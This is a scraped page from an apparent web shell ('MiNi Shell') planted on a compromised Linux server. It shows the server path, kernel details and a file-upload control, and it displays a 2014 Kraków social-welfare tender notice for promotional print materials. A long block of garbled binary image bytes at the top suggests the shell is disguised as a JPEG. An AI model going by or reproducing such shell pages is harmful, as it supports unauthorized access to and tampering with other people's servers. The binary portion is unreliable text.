JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140122/24586-N-2014.html

<p class="kh_header"><b>Kraków: Wykonanie projektów materiałów promocyjnych, ich wydruk i dostawa oraz przekazanie Zamawiającemu na nośniku multimedialnym projektów w pliku .cmd i .pdf oraz przeniesienie na Zamawiającego majątkowych praw autorskich do projektów</b><br>
<b>Numer ogłoszenia: 24586 - 2014; data zamieszczenia: 22.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów materiałów promocyjnych, ich wydruk i dostawa oraz przekazanie Zamawiającemu na nośniku multimedialnym projektów w pliku .cmd i .pdf oraz przeniesienie na Zamawiającego majątkowych praw autorskich do projektów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszej umowy jest:
1)	wykonanie projektów materiałów promocyjnych (tj. ulotek, plakatów, papieru firmowego) na podstawie wstępnych projektów w/w materiałów zgodnie z zarządzeniem nr 610/2012 Prezydenta Miasta Krakowa z dnia 09.03.2012 r. w sprawie stosowania jednolitej linii graficznej Miasta Krakowa przez komórki organizacyjne UMK i miejskie jednostki organizacyjne, Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z 04.02.2009 r. i innymi wytycznymi i uwagami wskazanymi przez Zamawiającego, przedłożenie wykonanych projektów do akceptacji Zamawiającego i Wydziału Informatyki, Turystyki i Promocji Miasta Urzędu Miasta Krakowa,
2)	wydruk i dostawa materiałów promocyjnych zatwierdzonych przez Zamawiającego i Wydział Informacji, Turystyki i Promocji Miasta UMK,
3)	przekazanie Zamawiającemu na nośniku multimedialnym projektów w pliku .cmd i .pdf oraz przeniesienie na Zamawiającego majątkowych praw autorskich do projektów wydawnictw.
2.	Zakres przedmiotu umowy określa załącznik nr 1 do wzoru umowy.
3.	Zamawiający zastrzega sobie prawo do zmiany ilości zamawianych materiałów w obrębie asortymentu wymienionego w zamówieniu, do wysokości kwoty umowy.
4.	Dostawy wydrukowanych materiałów, o których mowa w ust. 2 niniejszego paragrafu, realizowane będą na podstawie pisemnych zamówień częściowych składanych przez Zamawiającego, drogą listowną oraz za pośrednictwem poczty elektronicznej e-mail na adres e-mail wskazany w ofercie.
5.	Miejscem dostawy będzie siedziba Sekcji Zarządzania Projektem Systemowym, ul. Mostowa 4, Kraków, w godzinach pracy Zamawiającego, tj. od poniedziałku do piątku od godz. 7:30 do 15:30.
6.	Terminy realizacji przedmiotu umowy:
1)	do 3 dni roboczych od daty podpisania umowy Wykonawca prześle Zamawiającemu do akceptacji, mailem na adres e-mail: sp@mops.krakow.pl wykonany projekt graficzny w pliku .pdf,
2)	do 2 dni roboczych od daty otrzymania uwag Zamawiającego Wykonawca prześle Zamawiającemu poprawiony projekt. Czynności te należy powtarzać do momentu uzyskania całkowitej akceptacji danego projektu,
3)	do 1 dnia roboczego od daty otrzymania akceptacji Zamawiającego Wykonawca prześle projekt graficzny każdego materiału do uzgodnienia do Wydziału Informacji, Turystyki i Promocji Miasta na adres e-mail: druki@um.krakow.pl, w pliku .jpg lub .pdf - projekt powinien zostać przekazany nie później niż 14 dni przed datą produkcji danego wydawnictwa,
4)	do 2 dni roboczych od daty otrzymania uwag Wydziału Informacji, Turystyki i Promocji Miasta Wykonawca przekaże Wydziałowi poprawiony projekt - czynności te należy powtarzać do momentu uzyskania całkowitej akceptacji danego projektu,
5)	do 1 dnia roboczego od daty akceptacji projektu przez Wydział Informacji, Turystyki i Promocji Miasta UMK Wykonawca dostarczy Zamawiającemu ostateczny projekt do akceptacji. Zamawiający na tym etapie może zgłosić dodatkowe uwagi, o ile poprzednio zaakceptowany projekt uległ zmianom,
6)	do 4 dni roboczych od daty ostatecznej akceptacji projektu przez Zamawiającego Wykonawca dostarczy Zamawiającemu:
a)	projekt graficzny na płycie CD / pendrivie jako plik otwarty (w formacie .cmd) z możliwością ingerencji w projekt za pomocą powszechnie dostępnego oprogramowania oraz jako plik .pdf w skali 1:1,
b)	potwierdzenie uzgodnienia projektu z Wydziałem Informacji, Turystyki i Promocji Miasta UMK;
7)	do 4 dni roboczych od daty złożenia zamówienia częściowego Wykonawca dostarczy Zamawiającemu przedmiot umowy w ilościach i asortymencie zgodnie                        z zamówieniem częściowym.
7.	Warunki dodatkowe:
1)	Wszystkie materiały dla danego Programu Aktywności Lokalnej (ulotki, papier firmowy, plakat) powinny wykorzystywać ten sam schemat graficzny (grafika, kolory, czcionki, rozmieszczenie elementów projektu).
2)	Jednocześnie wszystkie materiały powinny prezentować jednolitą szatę graficzną       w zakresie czcionek, rozmieszczenia elementów.
3)	Wykorzystywane logotyp MOPS i znak towarowy Kraków.pl Zamawiający udostępni Wykonawcy po podpisaniu umowy, natomiast loga POKL, UE - EFS, POKL i UE są do pobrania na stronie: http://www.efs.gov.pl/zpfe/strony/logo.aspx.
4)	Zamawiający posiada prawa autorskie do przekazywanych projektów publikacji (dotyczy projektów ulotek i plakatów z poprzednich lat) - pozostałe materiały stanowią opis koncepcji projektu graficznego zlecanego Wykonawcy.
5)	Osobą odpowiedzialną za ostateczną akceptację projektu materiałów promocyjnych jest Kierownik Sekcji Zarządzania Projektem Systemowym Pan Łukasz Hobot.
6)	Osobą upoważnioną ze strony Zamawiającego do kontaktu przy realizacji przedmiotu zamówienia jest Pani Agnieszka Więcek tel. 12 257-00-79.
7)	Osobą uprawnioną ze strony Wykonawcy do kontaktu przy realizacji niniejszej umowy jest osoba wskazana w ofercie.
8)	Koszt wykonania projektu ma zostać uwzględniony przez Wykonawcę w cenie oferty.
9)	Dostawa materiałów nastąpi transportem własnym Wykonawcy i na jego koszt.
10)	Korespondencja w sprawie realizacji przedmiotu umowy będzie prowadzona drogą     e-mailową.
11)	Opakowanie i sposób przewozu przedmiotu umowy powinny odpowiadać właściwościom zamawianego towaru.
12)	Zamawiający zastrzega sobie prawo do odmowy przyjęcia i zapłaty za towar niezgodny z zaakceptowanym projektem oraz taki, który nie uzyskał akceptacji Wydziału Informacji, Turystyki i Promocji Miasta.
13)	Elementem ulotek dotyczących PAL Celarowska (PAL5) i PAL Ugorek (PAL3) powinna być schematyczna mapka wskazująca obszar realizacji PAL i jego siedzibę.
14)	Wynagrodzenie za przeniesienie majątkowych praw autorskich Wykonawcy jest wliczone w cenę za wykonanie projektu graficznego i druk - Wykonawcy nie przysługuje żadne dodatkowe wynagrodzenie z tytułu przeniesienia praw autorskich, o których mowa powyżej.
15)	Wykonawca oświadcza, że dysponuje majątkowymi prawami autorskimi do wszystkich grafik i zdjęć wykorzystanych w materiale promocyjnym na wszelkich polach eksploatacji, pozwalających przenieść na Zamawiającego majątkowe prawa autorskie zgodnie z niniejszą umową.
16)	W przypadku stwierdzenia wad lub braków ilościowych, Zamawiający w terminie 14 dni od daty odbioru materiałów prześle Wykonawcy reklamacje, który w ciągu 3 dni roboczych od jej otrzymania zobowiązany jest usunąć wady lub braki ilościowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści umowy w następującym zakresie:
1)	zmiany czasu dostawy,
2)	miejsca dostawy towaru,
3)	warunków płatności,
4)	osób upoważnionych do kontaktów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14, 30-529 Kraków, pokój nr 003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2014 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14, 30-529 Kraków,  dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego - projekt Pora na aktywność..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com